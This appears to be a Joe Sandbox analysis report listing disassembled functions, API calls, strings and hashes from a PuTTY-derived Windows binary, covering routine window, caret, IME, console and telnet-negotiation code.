Uniqueness Score: -1.00%

Function 00CF94DC Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00CFA16A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00CFF669,?,00000000,-00000008), ref: 00CFA216

GetLastError.KERNEL32 ref: 00CF9540
__dosmaperr.LIBCMT ref: 00CF9547
GetLastError.KERNEL32(?,?,?,?), ref: 00CF9581
__dosmaperr.LIBCMT ref: 00CF9588

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: c00b18d60464136a80f181383c36bf7da5bc1097214c6090be1487597d975a57
Instruction ID: 0d27799e32c46570f2fc3fdbc6f459f3347c5f9bb680bf674d5dcbdffa3cf228
Opcode Fuzzy Hash: c00b18d60464136a80f181383c36bf7da5bc1097214c6090be1487597d975a57
Instruction Fuzzy Hash: 8021D47160020EAFDF62AF62D8C1A7BB7ADEF043647108619FA29C7250D730ED419B62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF18FB Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a16b7477935ef1aab26844ed66bba7e2dce0da678dbd1ee92c2d8f9075df663
Instruction ID: 1d675ffeee677129caaf9eba05275ae71772a2df1ebfb90924d23fc212296f5b
Opcode Fuzzy Hash: 0a16b7477935ef1aab26844ed66bba7e2dce0da678dbd1ee92c2d8f9075df663
Instruction Fuzzy Hash: A421CF7121020DEFCB90AF62C89197AB7ADAF003647194615FE29C7151D770EF409BE2

Uniqueness

Uniqueness Score: -1.00%

Function 00CFA221 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00CFA229

Part of subcall function 00CFA16A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00CFF669,?,00000000,-00000008), ref: 00CFA216

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CFA261
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CFA281

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 216b8865b633aca394684f768e1e6f6e86d42616259df5f87159d31a1601dada
Instruction ID: 4613c1042018e9f2d05d9a3c205e7346e10e3644ef52042e699e66308fdae106
Opcode Fuzzy Hash: 216b8865b633aca394684f768e1e6f6e86d42616259df5f87159d31a1601dada
Instruction Fuzzy Hash: E91104F260261DBFA79537B69C8AC7FBA6DDE853947110015FA09D1201FA31CE0095B3

Uniqueness

Uniqueness Score: -1.00%

Function 00C89640 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C89652
GetWindowRect.USER32(00000000,?), ref: 00C8965E
GetWindowRect.USER32(?), ref: 00C89670
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,75BF3EB0,?,?,?,00C5DA3C,?), ref: 00C896BE

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Rect$DesktopMove
String ID:
API String ID: 2894293738-0
Opcode ID: 32226d8005807a18af92064c5a641b906e5fc267a62f3c1e465c702ff9e9ad20
Instruction ID: 59cf0a1400a42941f87368701de43febc9eb6bb9422decba39bace319c569f40
Opcode Fuzzy Hash: 32226d8005807a18af92064c5a641b906e5fc267a62f3c1e465c702ff9e9ad20
Instruction Fuzzy Hash: 051170712043055FC704EF69EC8892B77EAEFD8354F094A2CF98587390E630F915CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C41928 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00C55C50: GetCaretBlinkTime.USER32 ref: 00C55C75

CreateCaret.USER32 ref: 00C4194D
ShowCaret.USER32 ref: 00C41954
FlashWindow.USER32(00000000), ref: 00C42D6E
DefWindowProcW.USER32(?,?,?,?), ref: 00C43520

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Caret$Window$BlinkCreateFlashProcShowTime
String ID:
API String ID: 3048652251-0
Opcode ID: bca32d5a557b64d238f31ea6d3e8e8c19bed22ddc63ca8620e3899ebaf5d3818
Instruction ID: eedd6df78a0ae85e79bb16b9310fbd3f7921b311441de37a8f82c40c7dc23d09
Opcode Fuzzy Hash: bca32d5a557b64d238f31ea6d3e8e8c19bed22ddc63ca8620e3899ebaf5d3818
Instruction Fuzzy Hash: B1117CBD9043409BD7219F20FC05B6A3BA5F785305F004118F249C6371DB7A0888EB72

Uniqueness

Uniqueness Score: -1.00%

Function 00C49B00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

SetCaretPos.USER32(FFFFFFFF,FFFFFFFF), ref: 00C49B32
ImmGetContext.IMM32 ref: 00C49B55
ImmSetCompositionWindow.IMM32(00000000), ref: 00C49B79
ImmReleaseContext.IMM32(00000000,00000000), ref: 00C49B85

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Context$CaretCompositionReleaseWindow
String ID:
API String ID: 3049481515-0
Opcode ID: 39c4b65f9e21c0f4c77262e8c54480e8ca894b7119baa300e1386c08974a3068
Instruction ID: 12e00ad536f87e89af3a6868210687856a2aba14e48ae209d46322e55609db18
Opcode Fuzzy Hash: 39c4b65f9e21c0f4c77262e8c54480e8ca894b7119baa300e1386c08974a3068
Instruction Fuzzy Hash: B101E9786013109FD764EF29E949B663BE4FB4A350F048418E548CB3A1D731E980DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C45DA0 Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C45DE1
DestroyIcon.USER32(FFFFFFFF,00000000,?,?,00C4B1A1,00000001,?,?,?,?,?,00C45C06,?,00C42A54), ref: 00C45DF0
DeleteObject.GDI32(?), ref: 00C45E18
CoUninitialize.OLE32(00000001,?,?,?,?,?,00C45C06,?,00C42A54), ref: 00C45E2D

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: DeleteObject$DestroyIconUninitialize
String ID:
API String ID: 1128191211-0
Opcode ID: 2485c9aadf32b05121c78f92319b0cb0d5d15630c7649b1472a0ae1cce5348d1
Instruction ID: 245332579b09d15bc60a48a0ba06e0593f9efcceca02c1156c235a3cc3d9c12b
Opcode Fuzzy Hash: 2485c9aadf32b05121c78f92319b0cb0d5d15630c7649b1472a0ae1cce5348d1
Instruction Fuzzy Hash: AC018178500B159BD710AF74ED49B1A37A9BF02354F140700F535C63E6DB72E940DA71

Uniqueness

Uniqueness Score: -1.00%

Function 00C41767 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00C4176C
ImmSetCompositionFontA.IMM32(00000000,00D41D88), ref: 00C41779
ImmReleaseContext.IMM32(?,00000000,00000000,00D41D88), ref: 00C41780
DefWindowProcW.USER32(?,?,?,?), ref: 00C43520

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Context$CompositionFontProcReleaseWindow
String ID:
API String ID: 3677218219-0
Opcode ID: 7fcbfd41603cf6b61be43cbb4ff0d5426440bb696eab266c0502fd9ca078d4ee
Instruction ID: ced535655ae13cef5d529d6c90663bb15a33a7166b474be0ba49218dc7f97112
Opcode Fuzzy Hash: 7fcbfd41603cf6b61be43cbb4ff0d5426440bb696eab266c0502fd9ca078d4ee
Instruction Fuzzy Hash: 39E02B727002041BC21032255C45A7BB2EDEFD1360F08803AB88E87382DD75CD1467B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D04C5B Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00D032E5,00000000,00000001,00000000,00000000,?,00CFC0C9,00000000,00000000,00000000), ref: 00D04C72
GetLastError.KERNEL32(?,00D032E5,00000000,00000001,00000000,00000000,?,00CFC0C9,00000000,00000000,00000000,00000000,00000000,?,00CFBA14,?), ref: 00D04C7E

Part of subcall function 00D04CCF: CloseHandle.KERNEL32(FFFFFFFE,00D04C8E,?,00D032E5,00000000,00000001,00000000,00000000,?,00CFC0C9,00000000,00000000,00000000,00000000,00000000), ref: 00D04CDF

___initconout.LIBCMT ref: 00D04C8E

Part of subcall function 00D04CB0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D04C4C,00D032D2,00000000,?,00CFC0C9,00000000,00000000,00000000,00000000), ref: 00D04CC3

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00D032E5,00000000,00000001,00000000,00000000,?,00CFC0C9,00000000,00000000,00000000,00000000), ref: 00D04CA3

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 57e039b9fd2ad3afda1c76ce79adc129e9e64f665ebab32901f81ff1605aa378
Instruction ID: 217101cc0e4c6752afcc574de80b7091a7ba4bf543bbf47f15e442fa9c473480
Opcode Fuzzy Hash: 57e039b9fd2ad3afda1c76ce79adc129e9e64f665ebab32901f81ff1605aa378
Instruction Fuzzy Hash: 5EF0F87A002214BBCF222FA1AC04E8A3F26FB093A1F054111FB1CC6260D63298309BB8

Uniqueness

Uniqueness Score: -1.00%

Function 00C5D560 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000000), ref: 00C5D56F
DialogBoxParamA.USER32(0000006F,?,00C5D5A0,00000000), ref: 00C5D581
EnableWindow.USER32(?,00000001), ref: 00C5D58A
SetActiveWindow.USER32(?), ref: 00C5D58D

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$Enable$ActiveDialogParam
String ID:
API String ID: 1750746890-0
Opcode ID: 0e96ef21857eca26931d9b2076ac1d5c32826afb7e93552003e31a71e1562222
Instruction ID: f191432e54ccb5316790a0ac54517f45c683a62ff587e20fd530ecbb3a7a3152
Opcode Fuzzy Hash: 0e96ef21857eca26931d9b2076ac1d5c32826afb7e93552003e31a71e1562222
Instruction Fuzzy Hash: 32D012352417607BD6213715BC09FCF3B5ADFC6B11F014011F601A62D446B12541CFB9

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B220 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

server subnegotiation: SB TTYPE SEND, xrefs: 00C6B539
client subnegotiation: SB TTYPE IS %s, xrefs: 00C6B54F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE SEND
API String ID: 0-571888287
Opcode ID: 3e35c0726b9a805608a073e30b0936e000974dd6cd84769ff42a5eda089fab66
Instruction ID: 6dcfeb9c629b34ea55f22a2d8e84b107a5c98ba579e60469a9625ce79448d637
Opcode Fuzzy Hash: 3e35c0726b9a805608a073e30b0936e000974dd6cd84769ff42a5eda089fab66
Instruction Fuzzy Hash: CBB13570608301DFD7309B29C885B6ABBA9EF45314F148A29F4AACB3D2D732DD85D752

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B47F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C6B4C0

Strings

server subnegotiation: SB TTYPE SEND, xrefs: 00C6B539
client subnegotiation: SB TTYPE IS %s, xrefs: 00C6B54F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE SEND
API String ID: 4218353326-571888287
Opcode ID: 9fba41db93b1c680c23f4056f48387c937daae527b7ba218dd57b2e14f76f45a
Instruction ID: c910bf962f9654c4d402ba1055944b5bd54725312aea6eb71e0adf74f3ca7276
Opcode Fuzzy Hash: 9fba41db93b1c680c23f4056f48387c937daae527b7ba218dd57b2e14f76f45a
Instruction Fuzzy Hash: F2913670608341DFD7309B29CC85B6ABBA5AB41314F248629F4BACB3E2D732DD85D752

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B457 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 249COMMON

Download Yara Rule

Strings

server subnegotiation: SB TTYPE SEND, xrefs: 00C6B539
client subnegotiation: SB TTYPE IS %s, xrefs: 00C6B54F

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE SEND
API String ID: 0-571888287
Opcode ID: 36878b0d08ebcf0ece8c3ea79fb8299bc965e565a0f6f8188a30a4c5b409bcb0
Instruction ID: 2ae15b094b794cf0a562d077f2c33bb6e40be772c5b542a6a6e352e85bd65c9a
Opcode Fuzzy Hash: 36878b0d08ebcf0ece8c3ea79fb8299bc965e565a0f6f8188a30a4c5b409bcb0
Instruction Fuzzy Hash: BA912670608341DFD7309B29C885B6ABB95AB45314F248629E4AACB3E2D732DC85D752

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E620 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?), ref: 00C7E6F0

Strings

p - mbstr < mblen, xrefs: 00C7E783, 00C7E7C1, 00C7E835, 00C7E86C
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/unicode.c, xrefs: 00C7E77E, 00C7E7BC, 00C7E830, 00C7E867

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/unicode.c$p - mbstr < mblen
API String ID: 626452242-1034799042
Opcode ID: ac53191d3ef13ba49586cba8f5c73a4d4d0e48b638f04f7de40f90512cb82c01
Instruction ID: f0111027591d5edc41e2f6da52c8eebdfd59f27b9201fc0ccfb3f92cd0eb1493
Opcode Fuzzy Hash: ac53191d3ef13ba49586cba8f5c73a4d4d0e48b638f04f7de40f90512cb82c01
Instruction Fuzzy Hash: E351F6326083859BD720DF19C885A6BB3E1AF98708F14C96CF99DCB381D731A944C792

Uniqueness

Uniqueness Score: -1.00%

Function 00C73320 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00C7340D
___from_strstr_to_strchr.LIBCMT ref: 00C7342B

Strings

TerminalModes, xrefs: 00C7334D, 00C7335D

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: TerminalModes
API String ID: 601868998-3469332156
Opcode ID: 42bd5e3531b61be00a44bbff4f51be1035aa28172322eb6a20997be39f82c0be
Instruction ID: e07c2901ebbeab46aafbb890ca2c906816723fe9f4d728b27f27fe99f2dfa768
Opcode Fuzzy Hash: 42bd5e3531b61be00a44bbff4f51be1035aa28172322eb6a20997be39f82c0be
Instruction Fuzzy Hash: 1F3137E69042C86BE73125352C52B373A994B92388F198024FD6D5B253F91A9F1AB272

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1570 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00CA15F0

Strings

false && "unhandled node type in exprnode_free", xrefs: 00CA15CE
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/utils/cert-expr.c, xrefs: 00CA15C9

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strlen
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/utils/cert-expr.c$false && "unhandled node type in exprnode_free"
API String ID: 4218353326-355256735
Opcode ID: 4a3a388df648ad945a622ef6def837d95fe1a42878f8d725945f7d05f01cb355
Instruction ID: 97176084517ffeadbf5cf16ce6be51001bd5713e3089c5d963c21337d44358ef
Opcode Fuzzy Hash: 4a3a388df648ad945a622ef6def837d95fe1a42878f8d725945f7d05f01cb355
Instruction Fuzzy Hash: FD316976E042124BD710AE28AC1256BB3E5DFC3378F0E4629EC5A473D0E731AD0597D2

Uniqueness

Uniqueness Score: -1.00%

Function 00C650B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00C650C5
___from_strstr_to_strchr.LIBCMT ref: 00C650D4

Strings

Event Log: %s, xrefs: 00C65143, 00C6518B

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: Event Log: %s
API String ID: 601868998-1617424366
Opcode ID: 4774a881e6a988d38ed07b48cfa84f6e8a76ec35bde643ef0698e2902c6b4788
Instruction ID: fb344311cca22a7367dcd353c5db98c388cf0433870a5d848a1976068db95cc6
Opcode Fuzzy Hash: 4774a881e6a988d38ed07b48cfa84f6e8a76ec35bde643ef0698e2902c6b4788
Instruction Fuzzy Hash: 952128B5900D406FD7315A29ECC676E3765AF07328F780125F42987291E722E964D6E3

Uniqueness

Uniqueness Score: -1.00%

Function 00D01E22 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00D01E2B

Strings

csm, xrefs: 00D01EBE
csm, xrefs: 00D01E4D

Memory Dump Source

